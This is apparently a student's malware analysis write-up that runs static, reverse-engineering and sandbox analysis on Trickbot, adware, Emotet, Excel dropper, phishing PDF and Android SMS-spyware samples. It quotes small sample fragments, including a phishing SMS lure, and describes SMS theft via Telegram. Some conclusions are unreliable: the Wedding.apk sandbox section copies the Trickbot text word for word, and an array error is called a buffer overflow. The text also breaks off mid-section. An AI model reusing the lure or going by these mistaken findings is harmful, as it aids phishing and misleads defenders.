Malware Analysis

September 2, 2025

What This Project is All About?

Here I showcase some malwares that I get from malicious whatsapp messages and the internet then analyze them using both Static and Dynamic Malware Analysis methods.

What is Malware Analysis?

The art of dissecting malware to understand how it works, how to identify it, and how to defeat or eliminate it.

Objectives of Malware Analysis

  1. Determine exactly what happened
  2. Locate all infected machines
  3. Locate all infected files

Techniques of Malware Analysis

  • Basic Static Analysis
  • Advanced Static Analysis
  • Dynamic Analysis Analyzed Malware Directory Directory 2

Basic Static Malware Analysis

Definition

Analyzing the executable file without viewing the actual instruction.

Main Objectives

  • Confirm whether the file is malicious or not
  • Provide information about the malware's functionality

Techniques

  1. Use 'file' or 'binwalk' command to identify the file type (dll, exe)
  2. Look for important strings in the file (look for function names or imported libraries)
  3. Identify if the executables are obfuscated / packed
  4. PE headers (to reveal malware functionalities)
  5. Use hashes to identify malware and antivirus tools to confirm maliciousness

Techniques, Objectives Breakdown and Tools Used

  1. Use 'file' or 'binwalk' command to identify the file type

Objectives

  • Identify the target OS and the corresponding architecture
  • Confirm whether a file is a PE (.exe, .dll, etc)
  • Analyze the file signature (to avoid double extensions, leading to false positives) which could be found on the file header (for example PE files are represented by hexadecimal values of 4D 5A or MZ in the first two bytes, PE programs also have the notice “This program can’t be run in DOS mode”, PE headers begins at hex 50 45)

Tools Used

  1. a. ‘file’ or ‘binwalk’

File is a terminal command to show us the type of the file while binwalk is a terminal command for analyzing, reverse engineering, and extracting firmware images, file systems, and other binary data.

  1. HxD

A GUI Hex editor which could show us the hex values of a file. c. PE Studio

Here, we’re gonna use this tool to analyze the type of file d. Detect it Easy

A GUI tool to determine the type of a file which could also be used to determine whether a file is packed / obfuscated even whether the file contains malicious code or not.

  1. Look for important strings in the file (function names or imported libraries)

Objectives

  • Extract readable characters and words from malwares (both ASCII and

Unicode format)

  • Get the idea of malwares’ functionalities
  • Get valuable informations (file names, URL’s, IP addresses, Registry keys, etc)

Tools used

  1. a. ‘strings’ cmd commands

cmd command used to show all the strings contained within a file. Here, we can look for things like file names, URLs, IP addresses, registry keys, etc.

  1. PE Explorer

A GUI for viewing, editing, and analyzing executable files, such as Windows PE (Portable Executable) files and DLLs (Dynamic Link Libraries).

  1. Identify if the executables are obfuscated / packed

Objectives

  • Identifying packers / obfuscators which makes malware analyzers to analyze strings (packers compress PEs)
  • If the file is packed, we’re gonna try unpacking it

Tools used

  1. a. PEiD

A GUI tool used to detect whether the file is packed / obfuscated or not by analyzing the headers and certain characteristics of a PE (Portable Executable) file.

  1. Exeinfo PE

A GUI tool to determine whether a file is packed and the packer that is being

used. Other than that, this tool is gonna show us how to unpack the packed file (if packed).

  1. c. Detect it Easy

A GUI tool to determine whether a file is packed / obfuscated or not by analyzing the section names and characteristics, entropy analysis, imported functions, overlay analysis, and signature matching.

  1. Use hashes to identify malware and antivirus tools to confirm maliciousness a. Hashtab

A GUI tool used to automatically see the md5 hash value of the file b. virustotal.com

A website used for determining whether the file’s maliciousness

Basic Malware Analysis

  1. VirusShare_01b55404de50bd1a56343b2f316ff88d a. Identify the file type

From analyzing the hex editor using HxD, we can see that it’s detected as a PE

file (contains MZ flag on its header also PE at 50 45)

Using PE studio, we can see that it’s detected as a PE file (contains MZ flag on its header, an executable which runs on 32-bit CPU).

From the above “file” command, we can see that the file is a PE32 executable

GUI.

From the above “binwalk” command, we can see that the file is also a PE file.

  1. b. Identify if the executables are obfuscated / packed also the file type

The result of analyzing this file using PEiD returns as “Nothing found *” whether we’re using normal, deep or hardcore scan mode. Meaning that the file is detected to be a valid executable, also PEiD detected it to be not using any packers.

From the above result using Detect It Easy, using recursive, verbose and deep scan we can see that the file is detected to be not using any packers.

However, by adding the Heuristic scan mode, we can see that the file is protected using generic heuristic [custom DOS] which is a security mechanism used by antivirus and anti-malware software to detect and block potential threats based on heuristic analysis.

PE32: PE32 refers to the standard 32-bit version of the Portable Executable file format.

Operating System: Windows: This indicates that the PE file is detected as intended to run on a Windows operating system, specifically Windows(95) and is a GUI.

Using Exeinfo PE, we can see that the file seems to be unpacked. It suggests that there’s a big section in .text section (but it seems to be obfuscated – we know this in the strings section in this assignment report text document), run a scan, or detect using DIE (Detect It Easy – we already know the result of using DIE previously that it uses generic heuristic as protection).

When we run a scan, the above image’s whats being presented.

  1. c. Look for important strings in the file, look for function names or imported libraries

Using the command “strings”

First, we’re gonna scan for ASCII strings only

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_01b55404de50bd

1a56343b2f316ff88d" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Ascii.txt"

Notes

  • a → this is gonna allow us to only search for ASCII only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Ascii.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full result here https://drive.google.com/file/d/1qev0WoCn76LxNISrUEmuZs1lvr2rQv- i/view?usp=drive_link

From the above result it seems like the file is obfuscated therefore we can’t read the strings in plaintext.

Next, we’re gonna scan for Unicode strings only.

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_01b55404de50bd

1a56343b2f316ff88d" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Unicode.txt"

Notes

  • u → this is gonna allow us to only search for Unicode only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Unicode.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full result here https://drive.google.com/file/d/1ujeWygQli2Vz_9X6GBZgjs3AudngXlBg/view

?usp=drive_link

From the above result, it seems like the unicode string is obfuscated.

Using PE Explorer

Here, we can analyze the relocations view which lists the informations about the base relocations present in the file.

In this case, there doesn’t seem to contain any useful information. That means

the file is probably obfuscated.

  1. d. Use hashes to identify malware and confirm maliciousness with virustotcom

Tool used: hashtab

From the above image, the file is detected as Trojan Trickbot (a notorious banking Trojan that first emerged in 2016. Initially, it primarily targeted financial institutions, aiming to steal sensitive banking information and credentials from infected systems).

  1. VirusShare_1ad9a67240d5775395c45b64dd6529fa a. Identify the file type

From analyzing the hex editor using HxD, we can see that it’s detected as a PE

file (contains MZ flag on its header also PE at 50 45)

Using PE studio, we can see that it’s detected as a PE file (contains MZ flag on its header, a GUI executable which runs on 32-bit CPU)

From the above image, using “strings” terminal command, this file is also considered to be a PE32 Executable file.

By using “binwalk” we could also determine that the file seems to be a PE file.

  1. b. Identify if the executables are obfuscated / packed also the file type

The result of analyzing this file using PEiD returns as “Nothing found *” if we’re doing the normal or deep scan. Meaning that the file is detected to be a valid executable, and PEiD detected it to not using any packers or obfuscation in these scan mode (normal or deep scans).

However, if we do hardcore scan, we can see that the file is packed using

Borderland Delphi.

From the above result using Detect It Easy, on recursive, deep, verbose, and heuristic scan modes, we can see that the file is detected to be using Borderland Delphi as obfuscation method.

PE32: the same as the previous one, It’s detected as an executable for Windows, more specifically Windows(2000), It’s a GUI, built using turbo linker, delphi compiler with Pascal as the language, and is using Inno setup installer.

Using Exeinfo PE, we can see that the file seems to be packed using Inno Setup mode Lzma2 but it seems to be crypted and seems to be suggesting us to use InnoExtractor or havysoft.cl**.**

  1. c. Look for important strings in the file, look for function names or imported libraries

Using the command “strings”

First, we’re gonna scan for ASCII strings only

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_1ad9a67240d577

5395c45b64dd6529fa" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Ascii.txt"

Notes

  • a → this is gonna allow us to only search for ASCII only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Ascii.txt"→ this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1GB8oAvwiPsw83Y93phrUiyNddO4klgJM/vie

w?usp=drive_link

from the above results there are some useful strings:

the below function calls seems to be allocating memory for loading additional

DLLs with their functions to the process memory space:

oleaut32.dll, SysFreeString, SysReAllocStringLen, SysAllocStringLen the below function calls seems to be doing registry manipulation: advapi32.dll, RegQueryValueExW, RegOpenKeyExW, RegCloseKey

the below function calls seems to be getting keyboard type and showing something (maybe a UI) to the victim’s computer:

GetKeyboardType, LoadStringW, MessageBoxA. CharNextW

The below functions seems to be doing process manipulations (showing the Ad

UI, setting how long the UI will be shown, etc):

kernel32.dll, GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, etc

The below function calls seems to be doing registry manipulations:

advapi32.dll, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW

The above information seems to be SSL encryption information which could potentially be used for:

  • Getting the Ad’s sources
  • encrypt communication between infected devices (bots) and their command-and-control (C2) servers.
  • evade network security controls, such as intrusion detection and prevention systems (IDS/IPS), firewalls, and deep packet inspection (DPI) devices
  • securely transmit stolen data, such as sensitive information (e.g., credentials, personally identifiable information) or exfiltrated documents, from infected devices to remote servers controlled by attackers.
  • Etc

Next, we’re gonna scan for Unicode strings only.

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_1ad9a67240d577

5395c45b64dd6529fa" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Unicode.txt"

Notes

  • u → this is gonna allow us to only search for Unicode only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Unicode.txt"→ this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1M3lLFJlAYY-

njCmVpq5GoHAIcV91Jqkl/view?usp=drive_link

from the above result, we can see some useful information

Some dlls (potential process manipulation and shell operations) and apis (User

Wow64DisableWow64FsRedirection for example which could be used to avoid detection)

Using PE Explorer

Here, we can see some potentially useful information in the import views, which contains a list of all the external functions and libraries that the executable file imports from other DLLs (Dynamic Link Libraries).

Imported functions: list of all the functions that the PE file imports from external

DLLs. This includes functions such as those related to file I/O, user interface

(UI) interactions, system calls, and more.

Imported libraries: The names of the DLLs from which the executable imports functions. These libraries provide the implementations for the imported functions and are dynamically linked to the executable at runtime.

From the above image, it seems like the file is allocating some process memory to call the other DLLs and their corresponding functions.

From the above image, it seems like the file is doing some registry manipulations.

The above image seems to be getting keyboard type and shows message UI

(possibly an ad to the victim’s computer)

From the above image, kernel32.dll parts seems to be doing the main thing of the adware (allocating spaces, setting the time to show the ad, showing the adware UI, etc)

The above image shows possible registry manipulation functionality

  1. d. Use hashes to identify malware and confirm maliciousness with virustotcom

Tool used: hashtab

From the above image, the file is detected as Adware. Adware is a type of software that displays advertisements on a user's computer, often in the form of pop-up ads, banners, or sponsored content. The primary purpose of adware is to generate revenue for its developers by delivering advertisements to users while they browse the internet or use other software applications.

III.      VirusShare_2fe5b00079aec2d8369a798230313ec8 a.   Identify the file type

From analyzing the hex editor using HxD, we can see that it’s doesn’t detect the file as a PE file. It seems to be detecting the file as Microsoft office file (DOC / XLS) (from the first bytes)

Using PE studio, we can see that it’s doesn’t detect the file as a PE file. The file seems to be detected as Microsoft document (DOC / XLS) (we can see from D0 CF in file header first bytes file type).\

from the above image, by using “file” terminal command, we can see that the file seems to be a microsoft document file.

from the above image, by using the binwalk command, the file seems to be a Zip archive which also contains JPEG.

  1. b. Identify if the executables are obfuscated / packed also the file type

The result of analyzing this file using PEiD returns as “Not a valid PE file” meaning it didn't match the basic signature of a PE file (the file is detected as a non Portable Executable).

From the above result using Detect It Easy, on recursive, deep, heuristic and verbose scan modes we can see that the file is detected as MS Office file.

From the above image, we can see that the file is a non-executable, It’s detected as

(MS Office 97-2003) file.

Using Exeinfo PE, we can see that the file seems to be obfuscated using .DOC

format. It also suggests us to try another file or use Ripper Menu.

After we tried using the ripper menu, the above image is all the files that we get.

If we unzip the file using “$ unzip [filename]”, the above files and folders is generated.

  1. c. Look for important strings in the file, look for function names or imported libraries

Using the command “strings”

First, we’re gonna scan for ASCII strings only

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_2fe5b00079aec2d

8369a798230313ec8" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Ascii.txt"

Notes

  • a → this is gonna allow us to only search for ASCII only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Ascii.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1QVJ9qlsFsAx0ZTDR3EK0QZ9vWAD_geu4/vi

ew?usp=drive_link

from the above result, we get some results: Is a DOC type of file:

Microsoft Forms 2.0 TextBox, Embedded Object, Forms.TextBox.1, Calibri, Microsoft Office Word, Alicia Mercier, Nisi, Title, Zepmlzbwtd, 0, 0, MSForms, TextBox

Next, we’re gonna scan for Unicode strings only.

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_2fe5b00079aec2d

8369a798230313ec8" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Unicode.txt" You can see the full results here

https://drive.google.com/file/d/1nm6yeVH08UM0oLFU9p50FfLT5fPxYFOR/vi ew?usp=drive_link

From the above analysis we can conclude that: The below strings are possible spoofing usages:

  • \G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
  • \G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program

Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0

Object Library

  • \G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation

  • \G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program

Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office

16.0 Object Library

  • \G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms

2.0 Object Library

  • \G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\Word8.0\ MSForms.exd#Microsoft Forms 2.0 Object Library

Notes

  • u → this is gonna allow us to only search for Unicode only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Unicode.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

Using PE Explorer

This is detected as not an EXE nor DLL file

  1. d. Use hashes to identify malware and confirm maliciousness with virustotcom

Tool used: hashtab

From the above image, the file is detected as Trojan Downloader Emotet. Emotet is a highly adaptable and dangerous trojan malware known for its role as a downloader, its global impact, and its ability to evade detection and maintain persistence on infected systems.

  1. VirusShare_3f0b1eed4b7b9ae05fab4d949843f103 a. Identify the file type

From analyzing the hex editor using HxD, we can see that it’s doesn’t detect the file as a PE file.

Using PE studio, we can see that it’s doesn’t detect the file as a PE file. Instead, It’s detected as a type of Microsoft document file (DOC / XLS) since it contains D0 CF in its first bytes of header**.**

from the above image, we can conclude that using “file” or “binwalk” doesn’t return any value.

  1. b. Identify if the executables are obfuscated / packed also the file type

The result of analyzing this file using PEiD returns as “Not a valid PE file” meaning it didn't match the basic signature of a PE file (the file is detected as a non Portable Executable).

From the above result using Detect It Easy, on recursive, deep, verbose, and heuristic scan modes we can see that the file is detected to be archived MS Office document.

If we add the .zip extension to the file and unzip it, this is the result:

Inside the VBA dir:

From the above image we can see that it contains several xls files.

  1. c. Look for important strings in the file, look for function names or imported libraries

Using the command “strings” to all the unzipped xls files

You can see the full results here

h t t ps ://dri ve.goog le.com/fi  le/d /1NR k0IhB FFekXuSnJST-

zB s Z4Vf IBOlk 4/v iew ?usp=dr ive_lin k

from the above results, there are some interesting stuffs: Files\CommoMicrosoft Shared\OFFICE15\MSO.0DLL C:\Windows\syst em32\tlb

Wscript.Shell

Set oFile = gfdgfdgdf.CreateTextFile("C:\secret\test1.txt") '37492:script1.vbs

Using PE Explorer

This is detected as not an EXE nor DLL file

  1. d. Use hashes to identify malware and confirm maliciousness with virustotcom

Tool used: hashtab

From the above image, the file is detected as MSExcel.Generic Dropper or Downloader. MSExcel Generic Dropper is a specific type of malware detection signature used by antivirus and security software to identify malicious behavior associated with Microsoft Excel files (XLS or XLSX) that act as droppers.

  1. VirusShare_480ef02bb062a57724e1b3e14532a140 a. Identify the file type

From analyzing the hex editor using HxD, we can see that it’s doesn’t detect the file as a PE file instead, a PDF file.

Using PE studio, we can see that it’s doesn’t detect the file as a PE file, instead a PDF file.

from the above image of using “file” terminal command, we can see that the file is a PDF

From the above image of using “binwalk” terminal command, we can see that the file also contains Zlib compressed datas.

  1. b. Identify if the executables are obfuscated / packed also the file type

The result of analyzing this file using PEiD returns as “Not a valid PE file” meaning it didn't match the basic signature of a PE file (the file is detected as a non Portable Executable).

From the above result using Detect It Easy, using recursive, deep, verbose, or heuristic scan modes we can see that the file is detected to not using any packers / obfuscation.

The file is not detected as an executable, but a PDF, which uses LF as its encoding.

  1. c. Look for important strings in the file, look for function names or imported libraries

Using the command “strings”

First, we’re gonna scan for ASCII strings only

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_480ef02bb062a5

7724e1b3e14532a140" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Ascii.txt"

Notes

  • a → this is gonna allow us to only search for ASCII only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Ascii.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1A7p9cKzaUfzOijo8iNqWo3Wbjrvghj2P/view?

usp=drive_link

from the above results, there are some interesting results:

The above strings seems to be suspicious links

Next, we’re gonna scan for Unicode strings only.

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_480ef02bb062a5

7724e1b3e14532a140" > "C:\Users\IEUser\Desktop\Results\String

Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Unicode.txt"

Notes

  • u → this is gonna allow us to only search for Unicode only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Unicode.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1qsTYbufQ2fFs2hRI6Dragh99r_HnszLk/view?u

sp=drive_link

from the above result, there seems to be no Unicode strings.

Using PE Explorer

This is detected as not an EXE nor DLL file

  1. d. Use hashes to identify malware and confirm maliciousness with virustotcom

Tool used: hashtab

From the above image, the file is detected as PDF:PhisingX-gen. PDF

PhisingX-get is a trojan malware embedded within a PDF file, likely designed to conduct phishing attacks. Such malware may attempt to trick users into clicking on malicious links, downloading additional malware, or disclosing sensitive information by presenting deceptive content within the PDF file.

  1. Wedding.apk
  2. Identify the file type

From analyzing the hex editor using HxD, we can see that it’s doesn’t detect the file as a PE file instead, a PK file.

Using PE studio, we can see that it’s doesn’t detect the file as a PE file, instead a PK file.

From the above “file” command result we can see that the file seems to be an

APK type of file.

From the above results, we can see that the file seems to contain some zip archived datas.

  1. b. Identify if the executables are obfuscated / packed also the file type

The result of analyzing this file using PEiD returns as “Not a valid PE file” meaning it didn't match the basic signature of a PE file (the file is detected as a non Portable Executable).

From the above result using Detect It Easy, using recursive, deep, verbose, and heuristic scan modes we can see that the file is detected to be not using any obvious packers / obfuscation.

The file is detected to be and Android APK, which is built using Kotlin with

Jetpack library.

  1. c. Look for important strings in the file, look for function names or imported libraries

Using the command “strings”

First, we’re gonna scan for ASCII strings only

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\wedding.apk" > "C:\Users\IEUser\Desktop\Results\String Results\wedding_Ascii.txt"

Notes

  • a → this is gonna allow us to only search for ASCII only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\wedding_Ascii.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1BWgr9MvuLoz8OK9WFRCtt0Gg2eFtHaEq/vi

ew?usp=drive_link

from the above result, there are some interesting stuffs:

The above image seems to be some short of encryption certificates and a manifest file name information.

Next, we’re gonna scan for Unicode strings only.

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\wedding.apk" > "C:\Users\IEUser\Desktop\Results\String Results\wedding_Unicode.txt"

Notes

  • u → this is gonna allow us to only search for Unicode only strings
  • n 5 → this is gonna allow us to output only the strings that are at least 5 characters long (since anything shorter a lot of time is useless)

"C:\Users\IEUser\Desktop\Results\String Results\wedding_Unicode.txt" → this is gonna allow us to output the result to a particular text file so that we could analyse it better

You can see the full results here https://drive.google.com/file/d/1R0cIHsd2ayV_VHsTdrfj_WZiDoVLrdXx/view

?usp=drive_link

from the above result, there are some interesting stuffs:

Looking at the above image, it seems like the program is spying on the target’s device’s SMS services.

Using PE Explorer

This is detected as not an EXE nor DLL file

  1. d. Use hashes to identify malware and confirm maliciousness with virustotcom

Tool used: hashtab

From the above image, the file is categorized as A Variant Of Android/Spy.SmsSpy.YW. Android SmsSpy spyware is a malicious software designed to secretly monitor and intercept SMS (Short Message Service) communications on Android devices. This type of malware is often used for espionage or surveillance purposes, allowing attackers to gather sensitive information, such as text messages, contact lists, and call logs, from the compromised device.

  1. Advanced Static Analysis

Definition

Reverse-engineering the malware’s internals by loading the executable into a disassembler and looking at the program instructions

Reverse Engineering Definition

The process of converting binary instructions to a higher level construct such that we can look at what the program does

Objectives

  • Tells us exactly what the program does
  • Understanding malware’s behavior by analyzing program’s flow
  • Detecting malicious codes
  • Assessing third party components and libraries (which is potentially a way for the hacker to communicate with its target)

Tools Used

  • Ghidra
  • JADX (for android app)
  1. 1. VirusShare_1ad9a67240d5775395c45b64dd6529fa

Here, we’re gonna be using Ghidra (better for PE analysis) The below flow shows the program flow.

From the above image we can conclude that there is the initial function then goes to an if statement which is going to call 2 other functions if one is chosen and if not, then goes to the end of the program directly.

FUN_004016C4 seems to be some short of memory allocation.

004016e9 seems to be the beginning of the if statement

004016ef seems to be the beginning of inside of the if statement if the condition is true.

004016ff seems to be the beginning of memory address assignment.

LAB0040171f seems to be the return value of FUN_004016C4. Advapi32.dll

The above function seems to be disabling (adjusting) all privileges and creating process memory space for more function calls.

Kernel32.dll

The above function seems like it’s creating some kinda processes that are related to process and thread managements (start or terminate processes, create new threads, manage process memory).

User32.dll

the above function seems to be creating the advertisement windows.

  1. 2. Wedding.apk

Here, we’re gonna be using JADX

From the above file, it seems like the there’s an error “arrayindexoutofbounds” at index 3447  out of 115 length. That seems like possible buffer overflow attack to automatically escalate this app’s privilege without asking for the user’s

permission.

From the image above, there are several files that are interesting to analyze (they have to do with some SMS services)

MainActivity

The above function basically broadcasts the receiver and asks the victim to go to a telegram link.

The above function is going to set permissions on SMS receive / send. The above function would also load a url which seems like an html document

The above function will trigger after a request permission request is completed. If the permission is granted, it’ll send a phising message “Selamat Nomor Kamu Mendapatkan Koin 1000 + sudah masuk ke nomor kamu Silakan cek di *363# Buruaan Sebelum Hangus”

ReceiveSMS

The above function seems to be listening for sent message from target device which then will send the received msg to the attacker’s telegram account. It’s gonna print out the message and device type.

SendSMS

The above function seems like it’s sending messages to the victim’s telegram account which contains the receiver and message as its content.

C.Dynamic Analysis

Definition

Observing malware’s functionality by actually executing them

Objectives

  • Observing memory content
  • Observing network packets being transmitted / received
  • Observing modified files and registry keys
  • Observing list of API calls
  • Etc

Sandbox Definition

A security mechanism for running untrusted programs in a safe environment without fear of harming ‘real’ systems.

Tools Used

  • Triage
  • Any.run
  • Cuckoo
  1. VirusShare_01b55404de50bd1a56343b2f316ff88d

Tri.age

Using tri.age, the static analysis result is 10/10 malicious, It’s a type of trickbot (modular banking trojan that primarily targets financial institutions, businesses, and individuals for financial theft and other malicious activities)

We can see the device types that it runs on.

We can also see the C2 Ips (remote communications that is running with the file)

the above two images are the result of doing dynamic analysis. We can see that It does something with the privilegetoken, finding shelltray, sending notify message, writing process memory, etc which could potentially have something to do with payment processes.

Any.run

Below is the result of the dynamic analysis using anyrun.

You can see that from the above image, the maliciousness is 5 out of 100. What it does is that it Drops the executable file immediately after the start.

This also does the following: Reads the machine GUID from the registry, Reads the computer name, Checks supported languages, Reads the machine GUID from the registry, Reads the computer name, Checks supported languages.

Cuckoo

Above is the result from cuckoo website, basically it’s a trickbot trojan that is 10 out of 10 malicious.

  1. VirusShare_1ad9a67240d5775395c45b64dd6529fa

Tri.age

Using tri.age, the static analysis result is 1/10 malicious. Below is the result of the dynamic analysis

The two above images basically says that It’s 3/10 malicious based on dynamic analysis. What the program does is that it checks for more information in the registry, adjust privilege, find shell tray, send notify message (maybe for ad popup), write process memory, uses task scheduler COM API (for access persistence). From these, we can conclude that It probably is an adware.

Any.run

You can see that from the above image, the maliciousness is 100 out of 100. This does the following: Reads the Internet Settings, Reads security settings of Internet Explorer, Application launched itself, Reads Internet Explorer settings, Reads Microsoft Outlook installation path, Checks supported languages, Reads the computer name, Create files in a temporary directory, Checks proxy server information, Reads Environment values, Reads product name, Reads the machine GUID from the registry, Manual execution by a user, Application launched itself

Cuckoo

Above is the result from cuckoo website, It’s 10/10 suspicious. basically what it does is:

Bypass DEP, Escalade privileges, Run a keylogger, Affect system registries, Affect system token, and Affect private profile.

  1. VirusShare_2fe5b00079aec2d8369a798230313ec8

Tri.age

Using tri.age, the static analysis result is 8/10 malicious, It’s a type of office

macro (a set of malicious instructions or commands written in a scripting language (such as Visual Basic for Applications, VBA) that can be embedded within Microsoft Office documents)).

Below is the result of the dynamic analysis

The above two images are the results of dynamic analysis. When the program runs, the a DOC is automatically opened. The program spawned unexpected child process, does process that makes network request (using powershell), checks information in registry, enumerates system info, adjusts privilege token, etc. Basically it does what a trojan downloader does (especially in spawning unexpected child process and making network requests also automatically opens DOC file).

Any.run

You can see that from the above image, the maliciousness is 100 out of 100 for the powershell and 60 out of 100 for winword.exe (productivity software and is used for creating, editing, formatting, and printing text documents).

This also does the following:

Creates an object to access WMI (SCRIPT),Non-standard symbols in registry,Executed via WMI Powershell.exe,Creates file in the systems drive root,The Powershell connects to the Internet,Unusual connection from system programs,Reads the Internet Settings, An automatically generated document, Reads mouse settings.

Cuckoo

Above is the result from cuckoo website, it’s10 out of 10 malicious. What it does is it basically Detect UserForm object in MS Office document and Detect a MS Office document with embedded VBA macro code.

  1. VirusShare_3f0b1eed4b7b9ae05fab4d949843f103

Tri.age

Using tri.age, the static analysis result is 8/10 malicious, It’s a type of macro (a set of malicious instructions or commands written in a scripting language (such as

Visual Basic for Applications, VBA) that can be embedded within Microsoft

Office documents)).

Below is the result of the dynamic analysis

From the above two images, we can see that the result of dynamic analysis  of the file is 1/10 malicious. The file enumerates system info in registry, enumerate processes, adjust privilege token, find shell tray, send notify message, and writeprocess memory. Basically the file seems to be doing what a Excel downloader should be doing but doesn’t seem to be very reflected in the dynamic analysis.

Any.run

You can see that from the above image, the maliciousness is 15 out of 100. This also does the following: this uses non-standar symbols In some cases, malware may use non-standard symbols as part of its evasion or obfuscation techniques. Malware authors may intentionally manipulate registry entries to make them harder to detect or analyze by security software.

Cuckoo

Above is the result from cuckoo website, this file is 10 out of 10 malicious. What it does is that it basically Detect a MS Office document with embedded VBA macro code.

  1. VirusShare_480ef02bb062a57724e1b3e14532a140

Tri.age

Using tri.age, the static analysis result is 3/10 malicious. Below is the result of the dynamic analysis

From the above image we can see that the malware automatically opens a PDF

and when we click on one of the image we’re gonna be redirected to the following page:

Unfortunately the page isn’t available anymore.

From the above image, we can see that the malware isn’t very malicious

The above image explains what the file does during the dynamic analysis.

Any.run

You can see that from the above image, the maliciousness is 20 out of 100. This does the following: Creates file in the systems drive root, Application launched itself, Reads Microsoft Office registry keys, Drops the executable file immediately after the start.

Cuckoo

Above is the result from cuckoo website, It’s 10/10 malicious. It’s detected as

PDF trojan phising.

  1. Wedding.apk

Tri.age

Using tri.age, the static analysis result is 1/10 malicious, It’s a type of trickbot (modular banking trojan that primarily targets financial institutions, businesses, and individuals for financial theft and other malicious activities)

Below is the result of the dynamic analysis

You can see that from the above image, the maliciousness is 5 out of 100. What it does is that it Drops the executable file immediately after the start.

This also does the following: Reads the machine GUID from the registry, Reads the computer name, Checks supported languages, Reads the machine GUID from the registry, Reads the computer name, Checks supported languages.

Cuckoo

